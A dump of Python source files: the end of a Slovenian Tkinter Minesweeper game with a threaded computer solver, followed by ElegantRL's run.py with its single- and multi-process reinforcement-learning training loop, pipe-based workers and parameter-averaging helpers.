""" self.nastavitve = Toplevel() self.nastavitve.title('Nastavitve') self.nastavitve.transient(self.master) # poskrbi, da je okno z nastavitvami vedno nad glavnim oknom self.nastavitve.focus() self.gameactive = False trenutna_velikost = StringVar() trenutna_velikost.set(self.velikost) Label(self.nastavitve, text='Velikost polja: ').grid(row=0, column=0, sticky='W') self.izbrana_velikost = Spinbox(self.nastavitve, from_=2, to=self.maxvelikost, textvariable=trenutna_velikost, command=self.posodobi_max_stevilo_min) self.izbrana_velikost.grid(row=0, column=1) self.izbrana_velikost.focus() trenutne_mine = StringVar() trenutne_mine.set(self.mine) Label(self.nastavitve, text='Število min: ').grid(row=1, column=0, sticky='W') self.izbrane_mine = Spinbox(self.nastavitve, from_=1, to=int(self.izbrana_velikost.get())**2, textvariable=trenutne_mine) self.izbrane_mine.grid(row=1, column=1) self.izbran_igralec = IntVar() self.izbran_igralec.set(1 if self.pomoc else 0) Checkbutton(self.nastavitve, text='Igro naj rešuje računalnik', var=self.izbran_igralec).grid(row=2, column=0, columnspan=2) Button(self.nastavitve, text='V redu', command=self.ponastavi).grid(row=3, column=1) self.nastavitve.bind("<Return>", self.ponastavi) def izhod(self, *args): """ Poskrbi za unicenje threada in glavnega okna ob izhodu iz igre. """ if self.vlakno is not None: self.vlakno.join() self.master.destroy() # *********************** # MEHANIZEM IGRE # *********************** def poteza(self, p): """ Sprejme potezo p in jo izvede. """ (x, y, m) = p if self.gameactive: if m: # če je m True, je uporabnik kliknil z desno tipko, torej oznacimo polje z zastavo ozn = self.polje[x][y].oznaci() if ozn: # polje smo uspesno oznacili self.narisi_mino(x, y) mine = self.preostale_mine.get() if (x, y) in self.zastave: self.zastave.remove((x, y)) self.zaprta_polja.append((x, y)) self.preostale_mine.set(mine + 1) else: self.zaprta_polja.remove((x, y)) self.zastave.append((x, y)) self.preostale_mine.set(mine - 1) self.preveri() else: # sicer polje odpremo if not self.polje[x][y].flagged: self.odpri_blok((x, y)) self.preveri() if self.gameactive and self.pomoc: self.platno.after(self.zakasnitev, self.prepusti_racunalniku) # ce igro resuje racunalnik, # potem ponovno poklicemo metodo, ki od racunalnika pridobi novo potezo def odpri_blok(self, koord): """ Sprejme tuple koord s koordinatami, kamor je uporabnik levo-kliknil (kjer je prazno polje), in odpre vsa sosednja polja, ce je stevilo min v okolici polja 0. Postopek ponavlja za vsako polje, ki se odpre, dokler ne naleti na polje, ki ima v okolici kaksno mino. """ checked = [koord] odpri = [koord] while odpri: x, y = odpri.pop() odpr = self.polje[x][y].odpri() if odpr: self.narisi_polje(x, y) if self.polje[x][y].prikaz == 'x': self.preveri(mina=True) break self.zaprta_polja.remove((x, y)) self.odprta_polja.append((x, y)) checked.append((x, y)) if self.polje[x][y].vrednost == 0: for i in range(max(0, x - 1), min(x + 2, self.velikost)): for j in range(max(0, y - 1), min(y + 2, self.velikost)): if not self.polje[i][j].odprto and not (i, j) in checked: odpri.append((i, j)) def polno(self): """ Preveri, ali je igralno polje zapolnjeno. """ if self.zaprta_polja: return False return True def preveri(self, mina=False): """ Preveri, ali je igre konec. Neobvezen parameter mina pove, ali je bila metoda poklicana, ker je igralec stopil na mino. 
""" polno = self.polno() if mina: self.gameactive = False self.porazi.set(self.porazi.get() + 1) elif polno and self.preostale_mine.get() == 0: # polje je pravilno izpolnjeno self.gameactive = False self.zmage.set(self.zmage.get() + 1) # *********************** # INPUT # *********************** def klik(self, klik): """ Metoda, ki je bindana na levi in desni klik miske. Ce igra poteka, naredi potezo glede na to, ali je uporabnik kliknil levo ali desno tipko. """ if self.gameactive and not self.pomoc: # uporabnik lahko klikne, ce igra poteka in ce je ne resuje racunalnik y = klik.x // self.kvadratek x = klik.y // self.kvadratek if x < self.velikost and y < self.velikost: # uporabnik je kliknil znotraj polja flag = True if klik.num == 3 else False # ali je uporabnik kliknil z desno ali levo tipko miske self.poteza((x, y, flag)) # *********************** # RISANJE # *********************** def narisi_mrezo(self): """ Narise mrezo na Canvasu. """ for i in range(1, self.velikost): self.platno.create_line(i * self.kvadratek, 0, i * self.kvadratek, self.velikost * self.kvadratek) self.platno.create_line(0, i * self.kvadratek, self.velikost * self.kvadratek, i * self.kvadratek) def narisi_polje(self, x, y): """ Narise kvadratek s stevilko. """ kvad = self.izracunaj_kvadratek(x, y) self.platno.create_rectangle(*kvad, fill=self.ozadje) stevilka = self.polje[x][y].vrednost sredina = self.izracunaj_sredino_kvadratka(x, y) if stevilka == 'x': self.platno.create_rectangle(*kvad, fill='#FF0000') self.platno.create_image(sredina, image=self.bomba) elif stevilka != 0: barva = BARVE[stevilka] self.platno.create_text(sredina, text=stevilka, font=('Arial', 14, 'bold'), fill=barva) def narisi_mino(self, x, y): """ Ali narise ali zbrise zastavico na polje. """ flag = self.polje[x][y].flagged # polje smo ze oznacili/odznacili, treba ga je samo se narisat sredina = self.izracunaj_sredino_kvadratka(x, y) if flag: kvad = self.izracunaj_kvadratek(x, y) self.platno.create_rectangle(*kvad, fill='#FF9696', width=1, outline='#000000') self.platno.create_image(sredina, image=self.zastava) else: tag = self.najdi_id(x, y) for t in tag: self.platno.delete(t) self.platno.delete(self.platno.find_closest(*sredina)) # ------ POMOZNE FUNKCIJE ZA RISANJE ------ def izracunaj_kvadratek(self, x, y): """ Izracuna tocki v levem zgornjem kotu in desnem spodnjem kotu kvadratka, ki se nahaja v vrstici x in stolpcu y. """ return [y * self.kvadratek, x * self.kvadratek, (y + 1) * self.kvadratek, (x + 1) * self.kvadratek] def izracunaj_sredino_kvadratka(self, x, y): """ Izracuna koordinate tocke na sredini kvadratka. """ return y * self.kvadratek + (self.kvadratek // 2), x * self.kvadratek + (self.kvadratek // 2) def najdi_id(self, x, y): """ Najde id vseh elementov na Canvasu znotraj kvadratka na koordinati x, y. """ kvad = self.izracunaj_kvadratek(x, y) return self.platno.find_enclosed(*kvad) # *********************** # SPREMLJANJE IGRE # *********************** def naredi_matriko(self): """ Naredi matriko, ki prikazuje trenutno stanje na polju. """ matrika = [['' for _ in range(self.velikost)] for _ in range(self.velikost)] for r in self.polje: for k in r: matrika[k.x][k.y] = k.prikaz return matrika # *********************** # INTELIGENCA # *********************** def prepusti_racunalniku(self): """ Pozene vzporedni thread, kjer racunalnik racuna potezo. 
""" if self.gameactive: self.p = None if self.inteligenca is None: self.inteligenca = racunalnik.Racunalnik() self.vlakno = threading.Thread(target=self.razmisljaj) self.vlakno.start() self.platno.after(self.zakasnitev, self.konec_razmisljanja) def razmisljaj(self): """ Racunalnik izracuna naslednjo potezo, ki se spravi v atribut p. """ m = self.naredi_matriko() p = self.inteligenca.vrni_potezo(m, int(self.preostale_mine.get())) self.p = p self.vlakno = None def konec_razmisljanja(self): """ Preveri, ali je racunalnik ze izracunal potezo. """ if self.p is None: # racunalnik se ni izracunal poteze self.platno.after(self.zakasnitev, self.konec_razmisljanja) else: # racunalnik je ze izracunal potezo self.poteza(self.p) # naredimo potezo self.p = None # *********************** # POMOZNE FUNKCIJE # *********************** def prikazi_celotno_polje(self, odkrito=False): """ Prikaze celotno polje min in praznih kvadratkov. """ niz = '' for x in self.polje: niz += '|' for y in x: n = y.vrednost if odkrito else str(y) niz += ' {0} |'.format(n) niz += '\n' print(niz) root = Tk() igrica = Minesweeper(root, 10, 20) root.mainloop()
run.py
import os import sys import time import torch import numpy as np import numpy.random as rd import multiprocessing as mp from elegantrl.env import build_env, build_eval_env from elegantrl.replay import ReplayBuffer, ReplayBufferMP from elegantrl.evaluator import Evaluator """[ElegantRL.2021.10.21](https://github.com/AI4Finance-LLC/ElegantRL)""" class Arguments: # [ElegantRL.2021.10.21] def __init__(self, env, agent): self.env = env # the environment for training self.env_num = getattr(env, 'env_num', 1) # env_num = 1. In vector env, env_num > 1. self.max_step = getattr(env, 'max_step', None) # the max step of an episode self.state_dim = getattr(env, 'state_dim', None) # vector dimension (feature number) of state self.action_dim = getattr(env, 'action_dim', None) # vector dimension (feature number) of action self.if_discrete = getattr(env, 'if_discrete', None) # discrete or continuous action space self.target_return = getattr(env, 'target_return', None) # target average episode return self.agent = agent # Deep Reinforcement Learning algorithm self.if_off_policy = agent.if_off_policy # agent is on-policy or off-policy if self.if_off_policy: # off-policy self.net_dim = 2 ** 8 # the network width self.max_memo = 2 ** 21 # capacity of replay buffer self.batch_size = self.net_dim # num of transitions sampled from replay buffer. self.target_step = 2 ** 10 # repeatedly update network to keep critic's loss small self.repeat_times = 2 ** 0 # collect target_step, then update network self.if_per_or_gae = False # use PER (Prioritized Experience Replay) for sparse reward else: # on-policy self.net_dim = 2 ** 9 # the network width self.max_memo = 2 ** 12 # capacity of replay buffer self.batch_size = self.net_dim * 2 # num of transitions sampled from replay buffer. self.target_step = self.max_memo # repeatedly update network to keep critic's loss small self.repeat_times = 2 ** 3 # collect target_step, then update network self.if_per_or_gae = False # use PER: GAE (Generalized Advantage Estimation) for sparse reward '''Arguments for training''' self.gamma = 0.99 # discount factor of future rewards self.reward_scale = 2 ** 0 # an approximate target reward usually be closed to 256 self.learning_rate = 2 ** -15 # 2 ** -14 ~= 3e-5 self.soft_update_tau = 2 ** -8 # 2 ** -8 ~= 5e-3 '''Arguments for device''' self.worker_num = 2 # rollout workers number pre GPU (adjust it to get high GPU usage) self.thread_num = 8 # cpu_num for evaluate model, torch.set_num_threads(self.num_threads) self.random_seed = 0 # initialize random seed in self.init_before_training() self.learner_gpus = (0,) # for example: os.environ['CUDA_VISIBLE_DEVICES'] = '0, 2,' self.workers_gpus = self.learner_gpus # for isaac gym '''Arguments for evaluate and save''' self.cwd = None # the directory path to save the model self.if_remove = True # remove the cwd folder? (True, False, None:ask me) self.break_step = +np.inf # break training after 'total_step > break_step' self.if_allow_break = True # allow break training when reach goal (early termination) self.eval_env = None # the environment for evaluating. None means set automatically. 
self.eval_gap = 2 ** 8 # evaluate the agent per eval_gap seconds self.eval_times1 = 2 ** 2 # number of times that get episode return in first self.eval_times2 = 2 ** 4 # number of times that get episode return in second self.eval_gpu_id = None # -1 means use cpu, >=0 means use GPU, None means set as learner_gpus[0] self.if_overwrite = False # Save policy networks with different episode return or overwrite def init_before_training(self): np.random.seed(self.random_seed) torch.manual_seed(self.random_seed) torch.set_num_threads(self.thread_num) torch.set_default_dtype(torch.float32) '''env''' assert isinstance(self.env_num, int) assert isinstance(self.max_step, int) assert isinstance(self.state_dim, int) or isinstance(self.state_dim, tuple) assert isinstance(self.action_dim, int) assert isinstance(self.if_discrete, bool) assert isinstance(self.target_return, int) or isinstance(self.target_return, float) '''agent''' assert hasattr(self.agent, 'init') assert hasattr(self.agent, 'update_net') assert hasattr(self.agent, 'explore_env') assert hasattr(self.agent, 'select_actions') '''auto set''' if self.cwd is None: agent_name = self.agent.__class__.__name__ env_name = getattr(self.env, 'env_name', self.env) self.cwd = f'./{agent_name}_{env_name}_{self.learner_gpus}' if self.eval_gpu_id is None: self.eval_gpu_id = self.learner_gpus[0] '''remove history''' if self.if_remove is None: self.if_remove = bool(input(f"| PRESS 'y' to REMOVE: {self.cwd}? ") == 'y') elif self.if_remove: import shutil shutil.rmtree(self.cwd, ignore_errors=True) print(f"| Remove cwd: {self.cwd}") else: print(f"| Keep cwd: {self.cwd}") os.makedirs(self.cwd, exist_ok=True) '''single processing training''' def train_and_evaluate(args, learner_id=0): args.init_before_training() # necessary! 
'''init: Agent''' agent = args.agent agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id], state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num, learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae) agent.save_or_load_agent(args.cwd, if_save=False) env = build_env(env=args.env, if_print=False, device_id=args.eval_gpu_id, env_num=args.env_num) if env.env_num == 1: agent.states = [env.reset(), ] assert isinstance(agent.states[0], np.ndarray) assert agent.states[0].shape == (env.state_dim,) else: agent.states = env.reset() assert isinstance(agent.states, torch.Tensor) assert agent.states.shape == (env.env_num, env.state_dim) '''init Evaluator''' eval_env = build_eval_env(args.eval_env, args.env, args.eval_gpu_id, args.env_num) evaluator = Evaluator(cwd=args.cwd, agent_id=0, eval_env=eval_env, eval_gap=args.eval_gap, eval_times1=args.eval_times1, eval_times2=args.eval_times2, target_return=args.target_return, if_overwrite=args.if_overwrite) evaluator.save_or_load_recoder(if_save=False) '''init ReplayBuffer''' if args.if_off_policy: buffer = ReplayBuffer(max_len=args.max_memo, state_dim=env.state_dim, action_dim=1 if env.if_discrete else env.action_dim, if_use_per=args.if_per_or_gae, gpu_id=args.learner_gpus[learner_id]) buffer.save_or_load_history(args.cwd, if_save=False) def update_buffer(_traj_list): ten_state, ten_other = _traj_list[0] buffer.extend_buffer(ten_state, ten_other) _steps, _r_exp = get_step_r_exp(ten_reward=ten_other[0]) # other = (reward, mask, action) return _steps, _r_exp else: buffer = list() def update_buffer(_traj_list): (ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list[0] buffer[:] = (ten_state.squeeze(1), ten_reward, ten_mask, ten_action.squeeze(1), ten_noise.squeeze(1)) _step, _r_exp = get_step_r_exp(ten_reward=buffer[1]) return _step, _r_exp """start training""" cwd = args.cwd gamma = args.gamma break_step = args.break_step batch_size = args.batch_size target_step = args.target_step repeat_times = args.repeat_times reward_scale = args.reward_scale if_allow_break = args.if_allow_break soft_update_tau = args.soft_update_tau del args '''init ReplayBuffer after training start''' if agent.if_off_policy: if_load = buffer.save_or_load_history(cwd, if_save=False) if not if_load: traj_list = agent.explore_env(env, target_step, reward_scale, gamma) steps, r_exp = update_buffer(traj_list) evaluator.total_step += steps '''start training loop''' if_train = True while if_train: with torch.no_grad(): traj_list = agent.explore_env(env, target_step, reward_scale, gamma) steps, r_exp = update_buffer(traj_list) logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau) with torch.no_grad(): temp = evaluator.evaluate_and_save(agent.act, steps, r_exp, logging_tuple) if_reach_goal, if_save = temp if_train = not ((if_allow_break and if_reach_goal) or evaluator.total_step > break_step or os.path.exists(f'{cwd}/stop')) print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}') agent.save_or_load_agent(cwd, if_save=True) buffer.save_or_load_history(cwd, if_save=True) if agent.if_off_policy else None evaluator.save_or_load_recoder(if_save=True) def get_step_r_exp(ten_reward): return len(ten_reward), ten_reward.mean().item() '''multiple processing training''' def train_and_evaluate_mp(args, agent_id=0): args.init_before_training() # necessary! 
process = list() mp.set_start_method(method='spawn', force=True) # force all the multiprocessing to 'spawn' methods '''learner''' learner_num = len(args.learner_gpus) learner_pipe = PipeLearner(learner_num) for learner_id in range(learner_num): '''evaluator''' if learner_id == learner_num - 1: evaluator_pipe = PipeEvaluator() process.append(mp.Process(target=evaluator_pipe.run, args=(args, agent_id))) else: evaluator_pipe = None '''explorer''' worker_pipe = PipeWorker(args.env_num, args.worker_num) for worker_id in range(args.worker_num): # if args.env_num == 1: # env_pipe = None # else: # env_pipe = PipeVectorEnv(args) # process.extend(env_pipe.process) env_pipe = None process.append(mp.Process(target=worker_pipe.run, args=(args, env_pipe, worker_id, learner_id))) process.append(mp.Process(target=learner_pipe.run, args=(args, evaluator_pipe, worker_pipe, learner_id))) [(p.start(), time.sleep(0.1)) for p in process] process[-1].join() process_safely_terminate(process) class PipeWorker: def __init__(self, env_num, worker_num): self.env_num = env_num self.worker_num = worker_num self.pipes = [mp.Pipe() for _ in range(worker_num)] self.pipe1s = [pipe[1] for pipe in self.pipes] def explore0(self, agent): act_dict = agent.act.state_dict() for worker_id in range(self.worker_num): self.pipe1s[worker_id].send(act_dict) traj_lists = [pipe1.recv() for pipe1 in self.pipe1s] return traj_lists def explore(self, agent): act_dict = agent.act.state_dict() if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801) # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu for key, value in act_dict.items(): act_dict[key] = value.to(torch.device('cpu')) for worker_id in range(self.worker_num): self.pipe1s[worker_id].send(act_dict) traj_lists = [pipe1.recv() for pipe1 in self.pipe1s] return traj_lists def run(self, args, _comm_env, worker_id, learner_id): # not elegant: comm_env # print(f'| os.getpid()={os.getpid()} PipeExplore.run {learner_id}') env = build_env(env=args.env, if_print=False, device_id=args.workers_gpus[learner_id], env_num=args.env_num) '''init Agent''' agent = args.agent agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id], state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num, learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae) if args.env_num == 1: agent.states = [env.reset(), ] else: agent.states = env.reset() # VecEnv '''loop''' gamma = args.gamma target_step = args.target_step reward_scale = args.reward_scale del args with torch.no_grad(): while True: act_dict = self.pipes[worker_id][0].recv() if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801) # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu for key, value in act_dict.items(): act_dict[key] = value.to(agent.device) agent.act.load_state_dict(act_dict) trajectory = agent.explore_env(env, target_step, reward_scale, gamma) if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801) # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. 
So I send torch.tensor_cpu trajectory = [[item.to(torch.device('cpu')) for item in item_list] for item_list in trajectory] self.pipes[worker_id][0].send(trajectory) class PipeLearner: def __init__(self, learner_num): self.learner_num = learner_num self.round_num = int(np.log2(learner_num)) self.pipes = [mp.Pipe() for _ in range(learner_num)] pipes = [mp.Pipe() for _ in range(learner_num)] self.pipe0s = [pipe[0] for pipe in pipes] self.pipe1s = [pipe[1] for pipe in pipes] self.device_list = [torch.device(f'cuda:{i}') for i in range(learner_num)] if learner_num == 1: self.idx_l = None elif learner_num == 2: self.idx_l = [(1,), (0,), ] elif learner_num == 4: self.idx_l = [(1, 2), (0, 3), (3, 0), (2, 1), ] elif learner_num == 8: self.idx_l = [(1, 2, 4), (0, 3, 5), (3, 0, 6), (2, 1, 7), (5, 6, 0), (4, 7, 1), (7, 4, 2), (6, 5, 3), ] else: print(f"| LearnerPipe, ERROR: learner_num {learner_num} should in (1, 2, 4, 8)") exit() def comm_data(self, data, learner_id, round_id): if round_id == -1: learner_jd = self.idx_l[learner_id][round_id] self.pipes[learner_jd][0].send(data) return self.pipes[learner_id][1].recv() else: learner_jd = self.idx_l[learner_id][round_id] self.pipe0s[learner_jd].send(data) return self.pipe1s[learner_id].recv() def comm_network_optim(self, agent, learner_id): device = self.device_list[learner_id] for round_id in range(self.round_num): data = get_comm_data(agent) data = self.comm_data(data, learner_id, round_id) if data: avg_update_net(agent.act, data[0], device) avg_update_optim(agent.act_optim, data[1], device) if data[1] else None avg_update_net(agent.cri, data[2], device) if data[2] else None avg_update_optim(agent.cri_optim, data[3], device) avg_update_net(agent.act_target, data[4], device) if agent.if_use_act_target else None avg_update_net(agent.cri_target, data[5], device) if agent.if_use_cri_target else None def run0(self, args, comm_eva, comm_exp, learner_id=0): # print(f'| os.getpid()={os.getpid()} PipeLearn.run, {learner_id}') pass '''init Agent''' agent = args.agent agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id], state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num, learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae) agent.save_or_load_agent(args.cwd, if_save=False) '''init ReplayBuffer''' if agent.if_off_policy: buffer_num = args.worker_num * args.env_num if self.learner_num > 1: buffer_num *= 2 buffer = ReplayBufferMP(max_len=args.max_memo, state_dim=args.state_dim, action_dim=1 if args.if_discrete else args.action_dim, if_use_per=args.if_per_or_gae, buffer_num=buffer_num, gpu_id=args.learner_gpus[learner_id]) buffer.save_or_load_history(args.cwd, if_save=False) def update_buffer(_traj_list): step_sum = 0 r_exp_sum = 0 for buffer_i, (ten_state, ten_other) in enumerate(_traj_list): buffer.buffers[buffer_i].extend_buffer(ten_state, ten_other) step_r_exp = get_step_r_exp(ten_reward=ten_other[:, 0]) # other = (reward, mask, action) step_sum += step_r_exp[0] r_exp_sum += step_r_exp[1] return step_sum, r_exp_sum / len(_traj_list) else: buffer = list() def update_buffer(_traj_list): _traj_list = list(map(list, zip(*_traj_list))) _traj_list = [torch.cat(t, dim=0) for t in _traj_list] (ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list buffer[:] = (ten_state.squeeze(1), ten_reward, ten_mask, ten_action.squeeze(1), ten_noise.squeeze(1)) _step, _r_exp = get_step_r_exp(ten_reward=buffer[1]) return _step, _r_exp '''start training''' cwd = args.cwd batch_size = args.batch_size repeat_times = 
args.repeat_times soft_update_tau = args.soft_update_tau del args if_train = True while if_train: traj_lists = comm_exp.explore(agent) if self.learner_num > 1: data = self.comm_data(traj_lists, learner_id, round_id=-1) traj_lists.extend(data) traj_list = sum(traj_lists, list()) steps, r_exp = update_buffer(traj_list) del traj_lists logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau) if self.learner_num > 1: self.comm_network_optim(agent, learner_id) if comm_eva: if_train, if_save = comm_eva.evaluate_and_save_mp(agent.act, steps, r_exp, logging_tuple) agent.save_or_load_agent(cwd, if_save=True) if agent.if_off_policy: print(f"| LearnerPipe.run: ReplayBuffer saving in {cwd}") buffer.save_or_load_history(cwd, if_save=True) def run(self, args, comm_eva, comm_exp, learner_id=0): # print(f'| os.getpid()={os.getpid()} PipeLearn.run, {learner_id}') pass '''init Agent''' agent = args.agent agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id], state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num, learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae) agent.save_or_load_agent(args.cwd, if_save=False) '''init ReplayBuffer''' if agent.if_off_policy: buffer_num = args.worker_num * args.env_num if self.learner_num > 1: buffer_num *= 2 buffer = ReplayBufferMP(max_len=args.max_memo, state_dim=args.state_dim, action_dim=1 if args.if_discrete else args.action_dim, if_use_per=args.if_per_or_gae, buffer_num=buffer_num, gpu_id=args.learner_gpus[learner_id]) buffer.save_or_load_history(args.cwd, if_save=False) def update_buffer(_traj_list): step_sum = 0 r_exp_sum = 0 for buffer_i, (ten_state, ten_other) in enumerate(_traj_list): buffer.buffers[buffer_i].extend_buffer(ten_state, ten_other) step_r_exp = get_step_r_exp(ten_reward=ten_other[:, 0]) # other = (reward, mask, action) step_sum += step_r_exp[0] r_exp_sum += step_r_exp[1] return step_sum, r_exp_sum / len(_traj_list) else: buffer = list() def update_buffer(_traj_list): _traj_list = list(map(list, zip(*_traj_list))) _traj_list = [torch.cat(t, dim=0) for t in _traj_list] (ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list buffer[:] = (ten_state.squeeze(1), ten_reward, ten_mask, ten_action.squeeze(1), ten_noise.squeeze(1)) _step, _r_exp = get_step_r_exp(ten_reward=buffer[1]) return _step, _r_exp '''start training''' cwd = args.cwd batch_size = args.batch_size repeat_times = args.repeat_times soft_update_tau = args.soft_update_tau del args if_train = True while if_train: traj_lists = comm_exp.explore(agent) if self.learner_num > 1: data = self.comm_data(traj_lists, learner_id, round_id=-1) traj_lists.extend(data) traj_list = sum(traj_lists, list()) if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801) # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. 
So I send torch.tensor_cpu traj_list = [[item.to(torch.device('cpu')) for item in item_list] for item_list in traj_list] steps, r_exp = update_buffer(traj_list) del traj_lists logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau) if self.learner_num > 1: self.comm_network_optim(agent, learner_id) if comm_eva: if_train, if_save = comm_eva.evaluate_and_save_mp(agent.act, steps, r_exp, logging_tuple) agent.save_or_load_agent(cwd, if_save=True) if agent.if_off_policy: print(f"| LearnerPipe.run: ReplayBuffer saving in {cwd}") buffer.save_or_load_history(cwd, if_save=True) class PipeEvaluator: # [ElegantRL.10.21] def __init__(self): super().__init__() self.pipe0, self.pipe1 = mp.Pipe() def evaluate_and_save_mp(self, agent_act, steps, r_exp, logging_tuple): if self.pipe1.poll(): # if_evaluator_idle if_train, if_save = self.pipe1.recv() act_cpu_dict = {k: v.cpu() for k, v in agent_act.state_dict().items()} else: if_train, if_save = True, False act_cpu_dict = None self.pipe1.send((act_cpu_dict, steps, r_exp, logging_tuple)) return if_train, if_save def run(self, args, _learner_id): # print(f'| os.getpid()={os.getpid()} PipeEvaluate.run {agent_id}') pass '''init: Agent''' agent = args.agent agent.init(net_dim=args.net_dim, gpu_id=args.eval_gpu_id, state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num, learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae) agent.save_or_load_agent(args.cwd, if_save=False) act = agent.act [setattr(param, 'requires_grad', False) for param in agent.act.parameters()] del agent '''init Evaluator''' eval_env = build_eval_env(args.eval_env, args.env, args.eval_gpu_id, args.env_num) evaluator = Evaluator(cwd=args.cwd, agent_id=0, eval_env=eval_env, eval_gap=args.eval_gap, eval_times1=args.eval_times1, eval_times2=args.eval_times2, target_return=args.target_return, if_overwrite=args.if_overwrite) evaluator.save_or_load_recoder(if_save=False) '''loop''' cwd = args.cwd break_step = args.break_step if_allow_break = args.if_allow_break del args if_save = False if_train = True if_reach_goal = False with torch.no_grad(): while if_train: act_dict, steps, r_exp, logging_tuple = self.pipe0.recv() if act_dict: act.load_state_dict(act_dict) if_reach_goal, if_save = evaluator.evaluate_and_save(act, steps, r_exp, logging_tuple) else: evaluator.total_step += steps if_train = not ((if_allow_break and if_reach_goal) or evaluator.total_step > break_step or os.path.exists(f'{cwd}/stop')) self.pipe0.send((if_train, if_save)) print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}') evaluator.save_or_load_recoder(if_save=True) # class PipeVectorEnv: # def __init__(self, args): # self.env_num = args.env_num # self.pipes = [mp.Pipe() for _ in range(self.env_num)] # self.pipe0s = [pipe[0] for pipe in self.pipes] # # env = build_env(args.eval_env) # self.max_step = env.max_step # self.env_name = env.env_name # self.state_dim = env.state_dim # self.action_dim = env.action_dim # self.action_max = env.action_max # self.if_discrete = env.if_discrete # self.target_return = env.target_return # del env # # self.process = list() # for env_id in range(args.env_num): # self.process.append(mp.Process(target=self.run, args=(args, env_id))) # args.random_seed += 1 # set different for each env # # [p.start() for p in self.process] # # def reset(self): # vec_state = [pipe0.recv() for pipe0 in self.pipe0s] # return vec_state # # def step(self, vec_action): # pipe0_step # for i in range(self.env_num): # 
self.pipe0s[i].send(vec_action[i]) # return [pipe0.recv() for pipe0 in self.pipe0s] # list of (state, reward, done) # # def run(self, args, env_id): # np.random.seed(args.random_seed) # # env = build_env(args.eval_env, if_print=False) # pipe1 = self.pipes[env_id][1] # del args # # state = env.reset() # pipe1.send(state) # # while True: # action = pipe1.recv() # state, reward, done, _ = env.step(action) # pipe1.send((env.reset() if done else state, reward, done)) # # # def check(self): # # vec_state = self.reset() # # ten_state = np.array(vec_state) # # print(ten_state.shape) # # # # vec_action = np.array(((0.0, 1.0, 0.0), # # (0.0, 0.5, 0.0), # # (0.0, 0.1, 0.0),))[:self.env_num] # # assert self.env_num <= 3 # # # # trajectory_list = list() # # for _ in range(8): # # s_r_d_list = self.step(vec_action) # # ten_state = np.array([s_r_d[0] for s_r_d in s_r_d_list]) # # print(ten_state.shape) # # trajectory_list.append(s_r_d_list) # # # # trajectory_list = list(map(list, zip(*trajectory_list))) # 2D-list transpose # # print('| shape of trajectory_list:', len(trajectory_list), len(trajectory_list[0])) def get_comm_data(agent): act = list(agent.act.parameters()) cri_optim = get_optim_parameters(agent.cri_optim) if agent.cri is agent.act: cri = None act_optim = None else: cri = list(agent.cri.parameters()) act_optim = get_optim_parameters(agent.act_optim) act_target = list(agent.act_target.parameters()) if agent.if_use_act_target else None cri_target = list(agent.cri_target.parameters()) if agent.if_use_cri_target else None return act, act_optim, cri, cri_optim, act_target, cri_target # data """Utils""" def get_num_learner(visible_gpu): assert isinstance(visible_gpu, str) # visible_gpu may in {'0', '1', '1,', '1,2', '1,2,'} visible_gpu = eval(visible_gpu) num_learner = 1 if isinstance(visible_gpu, int) else len(visible_gpu) return num_learner def process_safely_terminate(process): for p in process: try: p.kill() except OSError as e: print(e) pass def get_optim_parameters(optim): # for avg_update_optim() params_list = list() for params_dict in optim.state_dict()['state'].values(): params_list.extend([t for t in params_dict.values() if isinstance(t, torch.Tensor)]) return params_list def avg_update_optim(dst_optim, src_optim_param, device): for dst, src in zip(get_optim_parameters(dst_optim), src_optim_param): dst.data.copy_((dst.data + src.data.to(device)) * 0.5) # dst.data.copy_(src.data * tau + dst.data * (1 - tau)) def avg_update_net(dst_net, src_net_param, device): for dst, src in zip(dst_net.parameters(), src_net_param): dst.data.copy_((dst.data + src.data.to(device)) * 0.5)
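A small standalone illustration (toy networks, not part of ElegantRL) of the parameter-averaging rule implemented by avg_update_net() and avg_update_optim() above: each learner overwrites its weights with the element-wise mean of its own and a peer's, so repeated exchange rounds pull all learners toward a shared model.

import torch.nn as nn

net_a = nn.Linear(4, 2)   # this learner's network
net_b = nn.Linear(4, 2)   # a peer learner's network

peer_params = [p.detach().clone() for p in net_b.parameters()]    # what the peer would send through the pipe
for dst, src in zip(net_a.parameters(), peer_params):
    dst.data.copy_((dst.data + src.data.to(dst.device)) * 0.5)    # same rule as avg_update_net()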
qPyMultiThread.py
